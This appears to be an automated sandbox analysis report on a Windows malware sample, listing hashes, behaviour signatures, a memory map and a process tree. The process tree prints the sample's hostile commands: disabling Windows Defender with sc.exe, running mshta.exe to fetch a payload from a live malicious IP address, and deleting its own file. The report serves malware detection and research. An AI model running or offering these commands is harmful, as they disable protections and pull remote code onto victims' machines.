Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-09-2024 03:37

General

  • Target

    eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe

  • Size

    2.3MB

  • MD5

    eeff0def88f30543c4b7f93976df37b4

  • SHA1

    299b1944a074d04e1f3f23a05918eb2fd4542c4a

  • SHA256

    1f59da5f8c3ed10ee6e27ca87592e3e81ab3cab6b7337ae40fae6a1e5887b243

  • SHA512

    0335863a8d5c3cb968f67429fbc375943717c20393230da083a335f3d2540d8ec9434513f45113d504b7f389c982268628f91129c2db279b4e8ae1fd3ac43fa8

  • SSDEEP

    49152:ukG9SpUleRvzfsEdDRUczjRO4Ye47YfW5I5GWMo/4abNpH1cZZ6k:uPSq6vzfJDRUczjfBGeF/4abNpVKZ6k

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=WLWOBVQV&2=i-s&3=99&4=9200&5=6&6=2&7=919041&8=1033

Signatures

  • Disables service(s) 3 TTPs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 20 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe"
    1⤵
    • Event Triggered Execution: Image File Execution Options Injection
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:400
    • C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2668
    • C:\Users\Admin\AppData\Roaming\xkgxhv.exe
      C:\Users\Admin\AppData\Roaming\xkgxhv.exe
      2⤵
      • Modifies WinLogon for persistence
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\SysWOW64\sc.exe
        sc stop WinDefend
        3⤵
        • Launches sc.exe
        • System Location Discovery: System Language Discovery
        PID:2780
      • C:\Windows\SysWOW64\sc.exe
        sc config WinDefend start= disabled
        3⤵
        • Launches sc.exe
        • System Location Discovery: System Language Discovery
        PID:436
      • C:\Windows\SysWOW64\mshta.exe
        mshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=WLWOBVQV&2=i-s&3=99&4=9200&5=6&6=2&7=919041&8=1033"
        3⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        PID:4244
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EEFF0D~1.EXE" >> NUL
      2⤵
      • System Location Discovery: System Language Discovery
      PID:5012

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\xkgxhv.exe

    Filesize

    2.3MB

    MD5

    eeff0def88f30543c4b7f93976df37b4

    SHA1

    299b1944a074d04e1f3f23a05918eb2fd4542c4a

    SHA256

    1f59da5f8c3ed10ee6e27ca87592e3e81ab3cab6b7337ae40fae6a1e5887b243

    SHA512

    0335863a8d5c3cb968f67429fbc375943717c20393230da083a335f3d2540d8ec9434513f45113d504b7f389c982268628f91129c2db279b4e8ae1fd3ac43fa8

  • memory/1640-0-0x0000000000400000-0x0000000000887000-memory.dmp

    Filesize

    4.5MB

  • memory/1640-1-0x0000000002660000-0x00000000026BA000-memory.dmp

    Filesize

    360KB

  • memory/1640-5-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

    Filesize

    4KB

  • memory/1640-9-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-8-0x00000000026F0000-0x00000000026F1000-memory.dmp

    Filesize

    4KB

  • memory/1640-7-0x00000000026D0000-0x00000000026D1000-memory.dmp

    Filesize

    4KB

  • memory/1640-6-0x00000000026E0000-0x00000000026E1000-memory.dmp

    Filesize

    4KB

  • memory/1640-2-0x0000000000B80000-0x0000000000B81000-memory.dmp

    Filesize

    4KB

  • memory/1640-4-0x0000000000B60000-0x0000000000B61000-memory.dmp

    Filesize

    4KB

  • memory/1640-3-0x0000000000B70000-0x0000000000B71000-memory.dmp

    Filesize

    4KB

  • memory/1640-16-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-15-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

    Filesize

    4KB

  • memory/1640-14-0x00000000036B0000-0x00000000036B1000-memory.dmp

    Filesize

    4KB

  • memory/1640-13-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-12-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-11-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-10-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-17-0x0000000002740000-0x0000000002741000-memory.dmp

    Filesize

    4KB

  • memory/1640-36-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-41-0x00000000036B0000-0x00000000036B1000-memory.dmp

    Filesize

    4KB

  • memory/1640-40-0x00000000036B0000-0x00000000036B1000-memory.dmp

    Filesize

    4KB

  • memory/1640-39-0x00000000036B0000-0x00000000036B1000-memory.dmp

    Filesize

    4KB

  • memory/1640-38-0x00000000036B0000-0x00000000036B1000-memory.dmp

    Filesize

    4KB

  • memory/1640-37-0x0000000000400000-0x0000000000887000-memory.dmp

    Filesize

    4.5MB

  • memory/1640-35-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-34-0x0000000002900000-0x0000000002901000-memory.dmp

    Filesize

    4KB

  • memory/1640-33-0x00000000036B0000-0x00000000036B1000-memory.dmp

    Filesize

    4KB

  • memory/1640-32-0x0000000002890000-0x0000000002891000-memory.dmp

    Filesize

    4KB

  • memory/1640-31-0x00000000036B0000-0x00000000036B1000-memory.dmp

    Filesize

    4KB

  • memory/1640-30-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-29-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-28-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-27-0x0000000002930000-0x0000000002931000-memory.dmp

    Filesize

    4KB

  • memory/1640-26-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-25-0x0000000002920000-0x0000000002921000-memory.dmp

    Filesize

    4KB

  • memory/1640-24-0x00000000028E0000-0x00000000028E1000-memory.dmp

    Filesize

    4KB

  • memory/1640-23-0x00000000028F0000-0x00000000028F1000-memory.dmp

    Filesize

    4KB

  • memory/1640-22-0x00000000028C0000-0x00000000028C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-21-0x0000000002870000-0x0000000002871000-memory.dmp

    Filesize

    4KB

  • memory/1640-20-0x00000000028A0000-0x00000000028A1000-memory.dmp

    Filesize

    4KB

  • memory/1640-19-0x0000000002710000-0x0000000002711000-memory.dmp

    Filesize

    4KB

  • memory/1640-18-0x0000000002720000-0x0000000002721000-memory.dmp

    Filesize

    4KB

  • memory/1640-43-0x0000000002660000-0x00000000026BA000-memory.dmp

    Filesize

    360KB

  • memory/1640-48-0x00000000036C0000-0x00000000036C1000-memory.dmp

    Filesize

    4KB

  • memory/1640-47-0x0000000000A30000-0x0000000000A31000-memory.dmp

    Filesize

    4KB

  • memory/1640-46-0x0000000000A20000-0x0000000000A21000-memory.dmp

    Filesize

    4KB

  • memory/1640-45-0x00000000036A0000-0x00000000036A2000-memory.dmp

    Filesize

    8KB

  • memory/1640-44-0x00000000036B0000-0x00000000036B3000-memory.dmp

    Filesize

    12KB

  • memory/1640-42-0x00000000036B0000-0x00000000036B1000-memory.dmp

    Filesize

    4KB

  • memory/1640-56-0x0000000000400000-0x0000000000887000-memory.dmp

    Filesize

    4.5MB

  • memory/1640-55-0x0000000002660000-0x00000000026BA000-memory.dmp

    Filesize

    360KB

  • memory/2036-53-0x0000000000400000-0x0000000000887000-memory.dmp

    Filesize

    4.5MB

  • memory/2036-58-0x0000000000400000-0x0000000000887000-memory.dmp

    Filesize

    4.5MB